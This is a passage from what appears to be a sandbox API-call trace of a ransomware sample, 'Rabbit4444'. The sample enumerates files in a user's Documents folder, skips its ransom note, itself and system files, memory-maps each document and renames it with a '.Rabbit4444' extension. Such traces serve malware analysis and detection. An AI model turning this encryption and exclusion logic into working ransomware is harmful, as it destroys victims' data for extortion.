hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0049.699] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.699] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0049.699] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14101021498) returned 1 [0049.700] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0049.700] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0049.700] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.700] CloseHandle (hObject=0x298) returned 1 [0049.700] CloseHandle (hObject=0x278) returned 1 [0049.701] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\5UIIwxxuSCwYbi_fDL.odp.Rabbit4444") returned 102 [0049.701] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\5UIIwxxuSCwYbi_fDL.odp" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\eyppts4fjo\\mmadp1sx8p2k7\\5uiiwxxuscwybi_fdl.odp"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\5UIIwxxuSCwYbi_fDL.odp.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\eyppts4fjo\\mmadp1sx8p2k7\\5uiiwxxuscwybi_fdl.odp.rabbit4444"), dwFlags=0x1) returned 1 [0049.701] InterlockedExchangeAdd (in: Addend=0xff618, Value=52144 | out: Addend=0xff618) returned 22724320 [0049.701] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3670 [0049.702] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17723360, ftCreationTime.dwHighDateTime=0x1d4d023, ftLastAccessTime.dwLowDateTime=0xc8f27c50, ftLastAccessTime.dwHighDateTime=0x1d4d184, ftLastWriteTime.dwLowDateTime=0xc8f27c50, ftLastWriteTime.dwHighDateTime=0x1d4d184, nFileSizeHigh=0x0, nFileSizeLow=0xcfe7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6lADbwLmhMb6k2_hQ.csv", cAlternateFileName="6LADBW~1.CSV")) returned 1 [0049.702] lstrcmpiW (lpString1="6lADbwLmhMb6k2_hQ.csv", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.702] lstrcmpiW (lpString1="6lADbwLmhMb6k2_hQ.csv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.702] lstrcmpiW (lpString1="6lADbwLmhMb6k2_hQ.csv", lpString2="Rabbit4444.exe") returned -1 [0049.702] lstrcmpiW (lpString1="6lADbwLmhMb6k2_hQ.csv", lpString2=".") returned 1 [0049.702] lstrcmpiW (lpString1="6lADbwLmhMb6k2_hQ.csv", lpString2="..") returned 1 [0049.702] lstrcmpiW (lpString1="6lADbwLmhMb6k2_hQ.csv", lpString2="windows") returned -1 [0049.702] lstrcmpiW (lpString1="6lADbwLmhMb6k2_hQ.csv", lpString2="bootmgr") returned -1 [0049.702] lstrcmpiW (lpString1="6lADbwLmhMb6k2_hQ.csv", lpString2="pagefile.sys") returned -1 [0049.702] lstrcmpiW (lpString1="6lADbwLmhMb6k2_hQ.csv", lpString2="boot") returned -1 [0049.702] lstrcmpiW (lpString1="6lADbwLmhMb6k2_hQ.csv", lpString2="ids.txt") returned -1 [0049.702] lstrcmpiW (lpString1="6lADbwLmhMb6k2_hQ.csv", lpString2="NTUSER.DAT") returned -1 [0049.702] lstrcpyW (in: lpString1=0x130ebc2, lpString2="6lADbwLmhMb6k2_hQ.csv" | out: lpString1="6lADbwLmhMb6k2_hQ.csv") returned="6lADbwLmhMb6k2_hQ.csv" [0049.702] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\6lADbwLmhMb6k2_hQ.csv", dwFileAttributes=0x0) returned 1 [0049.702] lstrlenW (lpString="6lADbwLmhMb6k2_hQ.csv") returned 21 [0049.702] lstrlenW (lpString="Rabbit4444") returned 10 [0049.702] lstrcmpiW (lpString1="6k2_hQ.csv", lpString2="Rabbit4444") returned -1 [0049.702] lstrlenW (lpString=".dll") returned 4 [0049.702] lstrcmpiW (lpString1=".csv", lpString2=".dll") returned -1 [0049.702] lstrlenW (lpString=".lnk") returned 4 [0049.702] lstrcmpiW (lpString1=".csv", lpString2=".lnk") returned -1 [0049.702] lstrlenW (lpString=".ini") returned 4 [0049.702] lstrcmpiW (lpString1=".csv", lpString2=".ini") returned -1 [0049.702] lstrlenW (lpString=".sys") returned 4 [0049.702] lstrcmpiW (lpString1=".csv", lpString2=".sys") returned -1 [0049.702] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\6lADbwLmhMb6k2_hQ.csv" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\eyppts4fjo\\mmadp1sx8p2k7\\6ladbwlmhmb6k2_hq.csv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.703] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.703] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14101340628) returned 1 [0049.703] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=53223) returned 1 [0049.703] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0049.703] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0049.703] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd2f0, lpName=0x0) returned 0x298 [0049.703] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd2f0) returned 0x70000 [0049.705] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.705] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0049.705] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.705] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0049.705] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.705] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0049.705] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.705] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0049.705] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14101595030) returned 1 [0049.705] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0049.705] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0049.705] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.706] CloseHandle (hObject=0x298) returned 1 [0049.706] CloseHandle (hObject=0x278) returned 1 [0049.708] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\6lADbwLmhMb6k2_hQ.csv.Rabbit4444") returned 101 [0049.708] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\6lADbwLmhMb6k2_hQ.csv" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\eyppts4fjo\\mmadp1sx8p2k7\\6ladbwlmhmb6k2_hq.csv"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\6lADbwLmhMb6k2_hQ.csv.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\eyppts4fjo\\mmadp1sx8p2k7\\6ladbwlmhmb6k2_hq.csv.rabbit4444"), dwFlags=0x1) returned 1 [0049.708] InterlockedExchangeAdd (in: Addend=0xff618, Value=53232 | out: Addend=0xff618) returned 22776464 [0049.708] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3672 [0049.708] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80912bc0, ftCreationTime.dwHighDateTime=0x1d4cdd6, ftLastAccessTime.dwLowDateTime=0xc3c322c0, ftLastAccessTime.dwHighDateTime=0x1d4c888, ftLastWriteTime.dwLowDateTime=0xc3c322c0, ftLastWriteTime.dwHighDateTime=0x1d4c888, nFileSizeHigh=0x0, nFileSizeLow=0x5c18, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9VM43enKtBNnJ.ppt", cAlternateFileName="9VM43E~1.PPT")) returned 1 [0049.708] lstrcmpiW (lpString1="9VM43enKtBNnJ.ppt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.708] lstrcmpiW (lpString1="9VM43enKtBNnJ.ppt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.708] lstrcmpiW (lpString1="9VM43enKtBNnJ.ppt", lpString2="Rabbit4444.exe") returned -1 [0049.708] lstrcmpiW (lpString1="9VM43enKtBNnJ.ppt", lpString2=".") returned 1 [0049.708] lstrcmpiW (lpString1="9VM43enKtBNnJ.ppt", lpString2="..") returned 1 [0049.708] lstrcmpiW (lpString1="9VM43enKtBNnJ.ppt", lpString2="windows") returned -1 [0049.709] lstrcmpiW (lpString1="9VM43enKtBNnJ.ppt", lpString2="bootmgr") returned -1 [0049.709] lstrcmpiW (lpString1="9VM43enKtBNnJ.ppt", lpString2="pagefile.sys") returned -1 [0049.709] lstrcmpiW (lpString1="9VM43enKtBNnJ.ppt", lpString2="boot") returned -1 [0049.709] lstrcmpiW (lpString1="9VM43enKtBNnJ.ppt", lpString2="ids.txt") returned -1 [0049.709] lstrcmpiW (lpString1="9VM43enKtBNnJ.ppt", lpString2="NTUSER.DAT") returned -1 [0049.709] lstrcpyW (in: lpString1=0x130ebc2, lpString2="9VM43enKtBNnJ.ppt" | out: lpString1="9VM43enKtBNnJ.ppt") returned="9VM43enKtBNnJ.ppt" [0049.709] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\9VM43enKtBNnJ.ppt", dwFileAttributes=0x0) returned 1 [0049.709] lstrlenW (lpString="9VM43enKtBNnJ.ppt") returned 17 [0049.709] lstrlenW (lpString="Rabbit4444") returned 10 [0049.709] lstrcmpiW (lpString1="KtBNnJ.ppt", lpString2="Rabbit4444") returned -1 [0049.709] lstrlenW (lpString=".dll") returned 4 [0049.709] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0049.709] lstrlenW (lpString=".lnk") returned 4 [0049.709] lstrcmpiW (lpString1=".ppt", lpString2=".lnk") returned 1 [0049.709] lstrlenW (lpString=".ini") returned 4 [0049.709] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0049.709] lstrlenW (lpString=".sys") returned 4 [0049.709] lstrcmpiW (lpString1=".ppt", lpString2=".sys") returned -1 [0049.709] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\9VM43enKtBNnJ.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\eyppts4fjo\\mmadp1sx8p2k7\\9vm43enktbnnj.ppt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.709] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.709] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14102009800) returned 1 [0049.709] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=23576) returned 1 [0049.709] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0049.709] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0049.710] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5f20, lpName=0x0) returned 0x298 [0049.710] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5f20) returned 0x70000 [0049.710] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.710] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0049.710] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.710] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0049.711] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.711] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0049.711] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.711] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0049.711] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14102162783) returned 1 [0049.711] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0049.711] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0049.711] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.711] CloseHandle (hObject=0x298) returned 1 [0049.711] CloseHandle (hObject=0x278) returned 1 [0049.712] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\9VM43enKtBNnJ.ppt.Rabbit4444") returned 97 [0049.712] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\9VM43enKtBNnJ.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\eyppts4fjo\\mmadp1sx8p2k7\\9vm43enktbnnj.ppt"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\9VM43enKtBNnJ.ppt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\eyppts4fjo\\mmadp1sx8p2k7\\9vm43enktbnnj.ppt.rabbit4444"), dwFlags=0x1) returned 1 [0049.712] InterlockedExchangeAdd (in: Addend=0xff618, Value=23584 | out: Addend=0xff618) returned 22829696 [0049.713] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3674 [0049.713] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9a7810, ftCreationTime.dwHighDateTime=0x1d4ce82, ftLastAccessTime.dwLowDateTime=0xc62bd010, ftLastAccessTime.dwHighDateTime=0x1d4cd43, ftLastWriteTime.dwLowDateTime=0xc62bd010, ftLastWriteTime.dwHighDateTime=0x1d4cd43, nFileSizeHigh=0x0, nFileSizeLow=0x5899, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HLSmokW YeF9u.odt", cAlternateFileName="HLSMOK~1.ODT")) returned 1 [0049.713] lstrcmpiW (lpString1="HLSmokW YeF9u.odt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.713] lstrcmpiW (lpString1="HLSmokW YeF9u.odt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.713] lstrcmpiW (lpString1="HLSmokW YeF9u.odt", lpString2="Rabbit4444.exe") returned -1 [0049.713] lstrcmpiW (lpString1="HLSmokW YeF9u.odt", lpString2=".") returned 1 [0049.713] lstrcmpiW (lpString1="HLSmokW YeF9u.odt", lpString2="..") returned 1 [0049.713] lstrcmpiW (lpString1="HLSmokW YeF9u.odt", lpString2="windows") returned -1 [0049.713] lstrcmpiW (lpString1="HLSmokW YeF9u.odt", lpString2="bootmgr") returned 1 [0049.713] lstrcmpiW (lpString1="HLSmokW YeF9u.odt", lpString2="pagefile.sys") returned -1 [0049.713] lstrcmpiW (lpString1="HLSmokW YeF9u.odt", lpString2="boot") returned 1 [0049.713] lstrcmpiW (lpString1="HLSmokW YeF9u.odt", lpString2="ids.txt") returned -1 [0049.713] lstrcmpiW (lpString1="HLSmokW YeF9u.odt", lpString2="NTUSER.DAT") returned -1 [0049.713] lstrcpyW (in: lpString1=0x130ebc2, lpString2="HLSmokW YeF9u.odt" | out: lpString1="HLSmokW YeF9u.odt") returned="HLSmokW YeF9u.odt" [0049.713] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\HLSmokW YeF9u.odt", dwFileAttributes=0x0) returned 1 [0049.713] lstrlenW (lpString="HLSmokW YeF9u.odt") returned 17 [0049.713] lstrlenW (lpString="Rabbit4444") returned 10 [0049.713] lstrcmpiW (lpString1=" YeF9u.odt", lpString2="Rabbit4444") returned -1 [0049.713] lstrlenW (lpString=".dll") returned 4 [0049.713] lstrcmpiW (lpString1=".odt", lpString2=".dll") returned 1 [0049.713] lstrlenW (lpString=".lnk") returned 4 [0049.713] lstrcmpiW (lpString1=".odt", lpString2=".lnk") returned 1 [0049.713] lstrlenW (lpString=".ini") returned 4 [0049.713] lstrcmpiW (lpString1=".odt", lpString2=".ini") returned 1 [0049.713] lstrlenW (lpString=".sys") returned 4 [0049.713] lstrcmpiW (lpString1=".odt", lpString2=".sys") returned -1 [0049.713] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\HLSmokW YeF9u.odt" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\eyppts4fjo\\mmadp1sx8p2k7\\hlsmokw yef9u.odt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.714] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.714] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14102433636) returned 1 [0049.714] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=22681) returned 1 [0049.714] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0049.714] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0049.714] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5ba0, lpName=0x0) returned 0x298 [0049.714] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5ba0) returned 0x70000 [0049.715] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.715] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0049.715] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.715] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0049.715] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.715] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0049.715] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.715] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0049.715] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14102582622) returned 1 [0049.723] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0049.723] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0049.723] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.723] CloseHandle (hObject=0x298) returned 1 [0049.723] CloseHandle (hObject=0x278) returned 1 [0049.724] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\HLSmokW YeF9u.odt.Rabbit4444") returned 97 [0049.724] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\HLSmokW YeF9u.odt" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\eyppts4fjo\\mmadp1sx8p2k7\\hlsmokw yef9u.odt"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\HLSmokW YeF9u.odt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\eyppts4fjo\\mmadp1sx8p2k7\\hlsmokw yef9u.odt.rabbit4444"), dwFlags=0x1) returned 1 [0049.724] InterlockedExchangeAdd (in: Addend=0xff618, Value=22688 | out: Addend=0xff618) returned 22853280 [0049.724] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3675 [0049.724] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40743560, ftCreationTime.dwHighDateTime=0x1d4cbaf, ftLastAccessTime.dwLowDateTime=0x3d4d9b0, ftLastAccessTime.dwHighDateTime=0x1d4c57a, ftLastWriteTime.dwLowDateTime=0x3d4d9b0, ftLastWriteTime.dwHighDateTime=0x1d4c57a, nFileSizeHigh=0x0, nFileSizeLow=0x7693, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="I4xTf-C.odp", cAlternateFileName="")) returned 1 [0049.724] lstrcmpiW (lpString1="I4xTf-C.odp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.724] lstrcmpiW (lpString1="I4xTf-C.odp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.724] lstrcmpiW (lpString1="I4xTf-C.odp", lpString2="Rabbit4444.exe") returned -1 [0049.724] lstrcmpiW (lpString1="I4xTf-C.odp", lpString2=".") returned 1 [0049.724] lstrcmpiW (lpString1="I4xTf-C.odp", lpString2="..") returned 1 [0049.724] lstrcmpiW (lpString1="I4xTf-C.odp", lpString2="windows") returned -1 [0049.724] lstrcmpiW (lpString1="I4xTf-C.odp", lpString2="bootmgr") returned 1 [0049.724] lstrcmpiW (lpString1="I4xTf-C.odp", lpString2="pagefile.sys") returned -1 [0049.724] lstrcmpiW (lpString1="I4xTf-C.odp", lpString2="boot") returned 1 [0049.725] lstrcmpiW (lpString1="I4xTf-C.odp", lpString2="ids.txt") returned -1 [0049.725] lstrcmpiW (lpString1="I4xTf-C.odp", lpString2="NTUSER.DAT") returned -1 [0049.725] lstrcpyW (in: lpString1=0x130ebc2, lpString2="I4xTf-C.odp" | out: lpString1="I4xTf-C.odp") returned="I4xTf-C.odp" [0049.725] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\I4xTf-C.odp", dwFileAttributes=0x0) returned 1 [0049.725] lstrlenW (lpString="I4xTf-C.odp") returned 11 [0049.725] lstrlenW (lpString="Rabbit4444") returned 10 [0049.725] lstrcmpiW (lpString1="4xTf-C.odp", lpString2="Rabbit4444") returned -1 [0049.725] lstrlenW (lpString=".dll") returned 4 [0049.725] lstrcmpiW (lpString1=".odp", lpString2=".dll") returned 1 [0049.725] lstrlenW (lpString=".lnk") returned 4 [0049.725] lstrcmpiW (lpString1=".odp", lpString2=".lnk") returned 1 [0049.725] lstrlenW (lpString=".ini") returned 4 [0049.725] lstrcmpiW (lpString1=".odp", lpString2=".ini") returned 1 [0049.725] lstrlenW (lpString=".sys") returned 4 [0049.725] lstrcmpiW (lpString1=".odp", lpString2=".sys") returned -1 [0049.725] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\I4xTf-C.odp" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\eyppts4fjo\\mmadp1sx8p2k7\\i4xtf-c.odp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.725] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.725] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14103602779) returned 1 [0049.725] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=30355) returned 1 [0049.725] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0049.725] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0049.725] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x79a0, lpName=0x0) returned 0x298 [0049.726] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x79a0) returned 0x70000 [0049.727] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.727] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0049.727] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.727] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0049.727] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.727] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0049.727] HeapFree (in: hHeap=0xe0000, 